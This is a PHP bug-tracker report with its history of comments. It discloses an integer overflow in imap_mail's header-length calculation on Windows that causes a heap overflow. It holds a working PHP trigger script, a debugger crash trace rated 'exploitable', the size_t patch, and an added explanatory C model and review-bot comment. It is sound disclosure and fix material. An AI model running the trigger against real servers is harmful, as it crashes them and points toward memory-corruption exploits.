Bug #73418 Integer Overflow in "_php_imap_mail" leads to Heap Overflow
Submitted: 2016-10-30 10:41 UTC Modified: 2017-02-13 00:59 UTC
From: orange at chroot dot org Assigned: stas (profile)
Status: Closed Package: IMAP related
PHP Version: 5.6 OS: Windows
Private report: No CVE-ID: None
 [2016-10-30 10:41 UTC] orange at chroot dot org
Description:
------------
Hi

I just reviewed the code of PHP 7 and found an integer overflow in the function _php_imap_mail.

The implementation of _php_imap_mail is OS-independent, but the bug only occurs on the Windows platform.

In file ext/imap/php_imap.c at line 3953:

```
3953	bufferHeader = (char *)emalloc(bufferLen + 1);
3954	memset(bufferHeader, 0, bufferLen);
```

bufferLen is declared as type int, but the argument type of emalloc is size_t. So if we provide a bufferLen of 0xffffffff, emalloc will create a memory region of zero bytes, and on the next line, memset will set 0xffffffff bytes to NULL.

I think the patch is just to change the type of bufferLen from int to size_t!



Test script:
---------------
```
<?php
    // Lift the memory limit: the three strings below total about 4 GiB.
    ini_set("memory_limit", "-1");

    $subject = 'x';
    $message = 'x';

    // Pick lengths so that the header buffer length computed inside
    // _php_imap_mail comes out at exactly 0xffffffff; the 12 subtracted here
    // leaves room for the fixed bytes the function adds on top of the
    // string lengths. (0xffffffff - 12) / 3 divides evenly, so $g / 3 is an int.
    $g = (0xffffffff - 12);
    $to = str_repeat("x", $g / 3);
    $header = str_repeat("x", $g / 3);
    $cc = str_repeat("x", $g / 3);

    // Truncated to a 32-bit int, 0xffffffff becomes -1: emalloc(bufferLen + 1)
    // allocates zero bytes, then memset(bufferHeader, 0, bufferLen) writes past it.
    imap_mail($to, $subject, $message, $header, $cc);
```

Actual result:
--------------
0:000> kb
 # RetAddr           : Args to Child                                                           : Call Site
00 00007ffe`032d7e35 : 00000000`ffffffff 00007ffd`f3ef3453 00000221`bc600000 00000000`55600000 : VCRUNTIME140!memset+0x49
01 00007ffe`032d864f : 00000221`66e00040 00000221`66e56418 00000221`66e56418 00000221`67000018 : php_imap!_php_imap_mail+0xa5 [c:\php-sdk\php70dev\vc14\x64\php-7.0.12\ext\imap\php_imap.c @ 3955]
02 00007ffd`f3efadd3 : 00000221`66e56400 00000221`66e6a3e0 00000221`00000000 00000221`66e56400 : php_imap!zif_imap_mail+0x14f [c:\php-sdk\php70dev\vc14\x64\php-7.0.12\ext\imap\php_imap.c @ 4115]
03 (Inline Function) : --------`-------- --------`-------- --------`-------- --------`-------- : php7!ZEND_DO_ICALL_SPEC_HANDLER+0x3f [c:\php-sdk\php70dev\vc14\x64\php-7.0.12\zend\zend_vm_execute.h @ 586]
04 00007ffd`f3f1d54c : 00000000`ffffffff 00000000`00000000 00000221`66e7e000 000000c5`bb3ff560 : php7!execute_ex+0x143 [c:\php-sdk\php70dev\vc14\x64\php-7.0.12\zend\zend_vm_execute.h @ 417]
05 00007ffd`f3f1d339 : 00000221`66e5c480 000000c5`bb3ff560 00000000`00000001 00000000`00000001 : php7!zend_execute+0x16c [c:\php-sdk\php70dev\vc14\x64\php-7.0.12\zend\zend_vm_execute.h @ 459]
06 00007ffd`f3f1d1a7 : 00000000`00000008 00000000`00000000 000000c5`00000003 00000000`00000000 : php7!zend_execute_scripts+0x119 [c:\php-sdk\php70dev\vc14\x64\php-7.0.12\zend\zend.c @ 1428]
07 00007ff6`83f91c12 : 00000000`00000000 00000221`66e03018 00000221`66e73200 00000221`66e03030 : php7!php_execute_script+0x477 [c:\php-sdk\php70dev\vc14\x64\php-7.0.12\main\main.c @ 2494]
08 00007ff6`83f91483 : 00000000`00000000 00000000`00000000 00007ff6`83f91560 00000000`00000000 : php!do_cli+0x692 [c:\php-sdk\php70dev\vc14\x64\php-7.0.12\sapi\cli\php_cli.c @ 975]
09 00007ff6`83f92629 : 00000000`00000000 00000000`00000000 00007ffe`27a369f8 00000000`00000000 : php!main+0x3d3 [c:\php-sdk\php70dev\vc14\x64\php-7.0.12\sapi\cli\php_cli.c @ 1344]
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\System32\KERNEL32.DLL - 
0a (Inline Function) : --------`-------- --------`-------- --------`-------- --------`-------- : php!invoke_main+0x22 [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 64]
0b 00007ffe`29b88364 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : php!__scrt_common_main_seh+0x11d [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 253]
0c 00007ffe`2a655e91 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
0d 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
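To make the arithmetic the report describes concrete, here is an added C model (not code from the bug report or from php-src) that reproduces only the length computation of _php_imap_mail, once with the pre-fix int accumulator and once with the size_t accumulator the fix introduces, and reports what emalloc and memset would be handed without performing the write. The 6-byte per-address overhead and the function and type names are assumptions, chosen so that the PoC's three strings of (0xffffffff - 12)/3 bytes add up to 0xffffffff; the checked-addition helper at the end goes beyond the page's own fix and is likewise an addition here.

```c
/*
 * Added example, not code from the PHP bug report or php-src.
 * Models the header-length arithmetic in _php_imap_mail with the old
 * `int bufferLen` and the fixed `size_t bufferLen`, and shows what
 * emalloc() and memset() would each be handed. No memory is written.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Length of each of the three strings in the report's PoC script. */
#define POC_CHUNK ((size_t)((0xffffffffULL - 12) / 3))
/* ASSUMPTION: fixed bytes added per To:/Cc: address (chosen so the PoC sums to 0xffffffff). */
#define ADDR_OVERHEAD 6

struct sizes {
    size_t alloc_len;   /* value that would reach emalloc() */
    size_t memset_len;  /* value that would reach memset() */
};

/* Vulnerable model: a 32-bit int accumulator, as declared before the fix.
 * Each `bufferLen += strlen(...)` converts the size_t sum back to int,
 * which truncates it modulo 2^32 on MSVC and GCC. */
static struct sizes model_int(size_t to_len, size_t headers_len, size_t cc_len)
{
    int bufferLen = 0;
    struct sizes s;

    bufferLen = (int)((size_t)bufferLen + headers_len);
    bufferLen = (int)((size_t)bufferLen + to_len + ADDR_OVERHEAD);
    bufferLen = (int)((size_t)bufferLen + cc_len + ADDR_OVERHEAD);

    /* `bufferLen + 1` is int arithmetic: with bufferLen == -1 it is 0, so
     * emalloc(0). (With bufferLen == INT_MAX it would be undefined behaviour.) */
    s.alloc_len = (size_t)(bufferLen + 1);
    /* The same -1 converted to memset's size_t parameter becomes SIZE_MAX. */
    s.memset_len = (size_t)bufferLen;
    return s;
}

/* Fixed model: size_t throughout, so both calls see the same number. */
static struct sizes model_size_t(size_t to_len, size_t headers_len, size_t cc_len)
{
    size_t bufferLen = 0;
    struct sizes s;

    bufferLen += headers_len;
    bufferLen += to_len + ADDR_OVERHEAD;
    bufferLen += cc_len + ADDR_OVERHEAD;

    s.alloc_len = bufferLen + 1;
    s.memset_len = bufferLen;
    return s;
}

/* The invariant the fix restores: the zeroed span fits inside the allocation. */
static int sizes_consistent(struct sizes s)
{
    return s.alloc_len > s.memset_len;
}

/* Beyond the page's fix: explicit wrap check on every addend, leaving room
 * for the +1 terminator. Returns 1 and stores the total, or 0 on overflow. */
static int total_len_checked(size_t to_len, size_t headers_len, size_t cc_len, size_t *out)
{
    const size_t addends[5] = { headers_len, to_len, ADDR_OVERHEAD, cc_len, ADDR_OVERHEAD };
    size_t acc = 0;
    for (int i = 0; i < 5; i++) {
        if (addends[i] > SIZE_MAX - acc)
            return 0;
        acc += addends[i];
    }
    if (acc == SIZE_MAX)   /* acc + 1 would wrap */
        return 0;
    *out = acc;
    return 1;
}

int main(void)
{
    struct sizes v = model_int(POC_CHUNK, POC_CHUNK, POC_CHUNK);
    struct sizes f = model_size_t(POC_CHUNK, POC_CHUNK, POC_CHUNK);

    printf("int accumulator:    emalloc(%zu), memset len %zu -> %s\n",
           v.alloc_len, v.memset_len, sizes_consistent(v) ? "ok" : "HEAP OVERFLOW");
    printf("size_t accumulator: emalloc(%zu), memset len %zu -> %s\n",
           f.alloc_len, f.memset_len, sizes_consistent(f) ? "ok" : "HEAP OVERFLOW");
    return 0;
}
```

On a 64-bit build the int model yields emalloc(0) with a memset length of SIZE_MAX, which is the write access violation in the windbg output above, while the size_t model yields a 4 GiB allocation one byte larger than the memset span. The type change is sufficient because PHP strings cannot reach sizes that wrap a 64-bit size_t, but total_len_checked shows the guard one would add if the accumulator ever had to stay narrower than the inputs.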


History
 [2016-10-30 10:49 UTC] orange at chroot dot org
Windbg Exploitable Extension Result:

0:000> !exploitable

!exploitable 1.6.0.0
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\System32\KERNEL32.DLL - 
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at VCRUNTIME140!memset+0x0000000000000049 (Hash=0x9665fc5c.0xce03d94a)

User mode write access violations that are not near NULL are exploitable.
 [2016-11-03 14:35 UTC] orange at chroot dot org
ping?
 [2016-11-03 16:12 UTC] ab@php.net
-Status: Open +Status: Verified
 [2016-11-03 16:12 UTC] ab@php.net
Thanks for the report. The fix is indeed to just use the correct datatype:

--- a/ext/imap/php_imap.c
+++ b/ext/imap/php_imap.c
@@ -3934,7 +3934,7 @@ int _php_imap_mail(char *to, char *subject, char *message, char *headers, char *
        char *tsm_errmsg = NULL;
        ADDRESS *addr;
        char *bufferTo = NULL, *bufferCc = NULL, *bufferBcc = NULL, *bufferHeader = NULL;
-       int offset, bufferLen = 0;
+       size_t offset, bufferLen = 0;
        size_t bt_len;

        if (headers) {
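Review bot: widening `offset` together with `bufferLen` to `size_t` in the `-`/`+` pair of this hunk changes signedness as well as width, so every later use of `offset` in this function (any subtraction, comparison against a negative value, or pass to an API expecting `int`) needs to be checked; that code lies outside the hunk, which touches only the declaration. For `bufferLen` the change is the whole fix: `emalloc(bufferLen + 1)` and `memset(bufferHeader, 0, bufferLen)` now receive the same value instead of an int that wraps to -1. Since the declaration reads like a cosmetic cleanup on its own, a one-line comment next to `size_t offset, bufferLen = 0;` saying that these must stay size_t to match `bt_len` and the allocation/memset arguments would keep the next refactor from reverting it.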


This is applied in the security branches for the upcoming 5.6 and 7.0+ releases as 99b242a6d093bca1f64084866b4491061de57553 and de643586dee986ff16c0a6be44813687786aa781.

Thanks.
 [2016-11-03 16:13 UTC] ab@php.net
-PHP Version: 7.0.12 +PHP Version: 5.6
 [2016-11-04 05:58 UTC] stas@php.net
-Status: Verified +Status: Closed -Assigned To: +Assigned To: stas
 [2016-11-04 05:58 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.


 [2016-11-04 06:26 UTC] orange at chroot dot org
Wow, thanks!

One more question, can you assign a CVE for this?
 [2016-11-05 22:53 UTC] ab@php.net
The new security issues classification is being discussed currently https://wiki.php.net/security 

But as it looks, this issue is of low severity according to the current classification. I've just pushed it into the security repo out of caution. But we will likely handle issues of this kind in such a way that they are pushed right into the public repository in the future. This is likely not an issue deserving a CVE, therefore.

Thanks.
 [2016-11-06 09:31 UTC] orange at chroot dot org
OK, thanks :)
 [2016-11-08 10:18 UTC] ab@php.net
Automatic comment on behalf of ab
Revision: http://git.php.net/?p=php-src.git;a=commit;h=99b242a6d093bca1f64084866b4491061de57553
Log: Fixed bug #73418 Integer Overflow in "_php_imap_mail" leads to crash
 [2016-11-08 10:18 UTC] ab@php.net
Automatic comment on behalf of ab
Revision: http://git.php.net/?p=php-src.git;a=commit;h=de643586dee986ff16c0a6be44813687786aa781
Log: Fixed bug #73418 Integer Overflow in "_php_imap_mail" leads to crash
 [2016-11-08 12:04 UTC] ab@php.net
Automatic comment on behalf of ab
Revision: http://git.php.net/?p=php-src.git;a=commit;h=35df4b1ae3cc9a3df4e99565037cee204280332e
Log: Fixed bug #73418 Integer Overflow in "_php_imap_mail" leads to crash
 [2016-11-09 01:37 UTC] tyrael@php.net
Automatic comment on behalf of ab
Revision: http://git.php.net/?p=php-src.git;a=commit;h=b823b14e374251ad6ab437a9631e4b010ca09b68
Log: Fixed bug #73418 Integer Overflow in "_php_imap_mail" leads to crash
 [2016-11-09 03:33 UTC] krakjoe@php.net
Automatic comment on behalf of ab
Revision: http://git.php.net/?p=php-src.git;a=commit;h=de643586dee986ff16c0a6be44813687786aa781
Log: Fixed bug #73418 Integer Overflow in "_php_imap_mail" leads to crash
 [2016-11-09 03:33 UTC] krakjoe@php.net
Automatic comment on behalf of ab
Revision: http://git.php.net/?p=php-src.git;a=commit;h=99b242a6d093bca1f64084866b4491061de57553
Log: Fixed bug #73418 Integer Overflow in "_php_imap_mail" leads to crash
 [2017-02-13 00:59 UTC] stas@php.net
-Type: Security +Type: Bug
 